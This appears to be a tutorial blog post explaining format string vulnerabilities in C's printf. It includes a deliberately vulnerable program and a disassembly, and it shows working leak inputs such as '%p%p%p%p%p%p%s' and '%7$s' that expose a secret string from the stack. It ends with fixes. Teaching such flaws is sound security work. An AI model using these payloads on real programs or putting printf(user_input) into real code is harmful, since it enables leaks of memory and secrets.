Skip to content

Getting to the vulnerability:

Let us consider a case where we forget to give the second argument to printf().

#include<stdio.h>

 int main()
 {
   int a=80;
   puts("Hello World");
   printf("The decimal is %d\n");
   return 0;
 }
Dump of assembler code for function main:
   0x0804843b <+0>:     lea    ecx,[esp+0x4]
   0x0804843f <+4>:     and    esp,0xfffffff0
   0x08048442 <+7>:     push   DWORD PTR [ecx-0x4]
   0x08048445 <+10>:    push   ebp
   0x08048446 <+11>:    mov    ebp,esp
   0x08048448 <+13>:    push   ecx
   0x08048449 <+14>:    sub    esp,0x14
   0x0804844c <+17>:    mov    DWORD PTR [ebp-0xc],0x50
   0x08048453 <+24>:    sub    esp,0xc
   0x08048456 <+27>:    push   0x8048500
   0x0804845b <+32>:    call   0x8048310 <puts@plt>
   0x08048460 <+37>:    add    esp,0x10
   0x08048463 <+40>:    sub    esp,0xc
   0x08048466 <+43>:    push   0x804850c
   0x0804846b <+48>:    call   0x8048300 <printf@plt>
   0x08048470 <+53>:    add    esp,0x10
   0x08048473 <+56>:    mov    eax,0x0
   0x08048478 <+61>:    mov    ecx,DWORD PTR [ebp-0x4]
   0x0804847b <+64>:    leave
   0x0804847c <+65>:    lea    esp,[ecx-0x4]
   0x0804847f <+68>:    ret
End of assembler dump.

Notice that there is only one push instruction before calling printf(). No variable is being pushed on to the stack.

1
2
3
The output will be:
Hello World
The decimal is 7
  1. Q. How does ‘7’ get there even when we forget to give any variable or value to be printed ?

    To answer the above question we shall look at a snapshot of the stack and just before the printf() function is called.

    fmt1

    Have a look at the stack, at the top of the stack we have the pointer to the format string. When printf() is called, what happens is that ‘%d’ gets replaced with whatever is there on stack right next to the pointer to format string. This is because printf() assumes the whatever is to be printed has already been pushed onto the stack. How can this error be a vulnerability ? What if the programmer decides to display a user controlled string using printf(), a C code like this:

    #include<stdio.h>
    
    int main()
    {
        char *str;
        char *secret="You don't get to see this";
        puts("I will repeat whatever you say");
        scanf("%s",str);
        printf(str);
        return 0;
    }
    

    Here we have a printf() function with one string ‘str’ as argument, that we can control. What if we apply the previous example in this case, can we not leak data on the stack at the instance when the call to printf() is made. Let us look at the stack right before the printf() is called.

    fmt2

    Here I gave input as “Hello” and hence the first argument is a pointer to “Hello” and the output will be “Hello” itself. Have a look at the stack. The next value on the stack is same pointer (this is because that pointer itself was pushed as argument for the scanf() function). Let’s give ‘%d’ after “Hello” as the input and see what our output is.

    The input is "Hello%d"

    fmt3

    Now there is a format specifier in our input. The next value on the stack is a pointer “0xffffd11c” which is a hexadecimal.

    1
    2
    The output we get is:
    Hello-12004
    

    -12004 is the decimal value of “0xffffd11c”.

    If we give more than one %d we get more info from the stack correspondingly.

    When the input is “%p%p%p” (we want to print the values on the stack in hexadecimal):

    0xffffd11c0xf7e29a500x804853b
    
    Now let’s get to the fun part. The programmer clearly doesn’t want the user to know what the “secret” string is and no part of the code prints it out.

    The”secret” string is stored on the stack, now we can get the pointer to the string.

    input: %p%p%p%p%p%p%p
    
    Output:
    0xffffd11c0xf7e29a500x804853b0x10xffffd1140xffffd11c 0x8048570
    
    As you can see the highlighted address is the pointer to “secret”. To view what the pointer holds we need to dereference it and then print it. We can use the ‘%s’ format specifier to do this. Let’s replace all the %ps with %s

    Oops, we will get a segmentation fault if we do that, the %s dereferences any value on the stack, printf() doesn’t check if it a valid address or not, so we will get a segmentation if the stack has some junk value,

    input : %p%p%p%p%p%p%s
    
    Output :
    0xffffd11c0xf7e29a500x804853b0x10xffffd1140xffffd11c You don't get to see this
    
    We have successfully leaked information that a user should not be knowing.

    Hacking is not all about doing something we aren’t supposed to. It is equally important to analyse the vulnerability or the mistake the programmer made that led to the compromise of data security.

In the previous example we gave %p%p%p%p%p%p%s as the input to get the leak. There is a different way of giving the same input. We can give it as %7$s, this prints whatever is there in the 7th offset from top of stack. This can come in handy when we go to the next section.

If you are using a 64bit binary, the offset changes since we have some registers which are used before using the stack

How could the programmer fix this issue

  • printf() should be used along with the format specifier. A %s as the first argument and then the user controlled argument will do do no harm.
  • Alternatively puts() function can be used to display on the screen.
  • Avoid leaving out sensitive data in unwanted places. Data abstraction is important.
Practice Challenges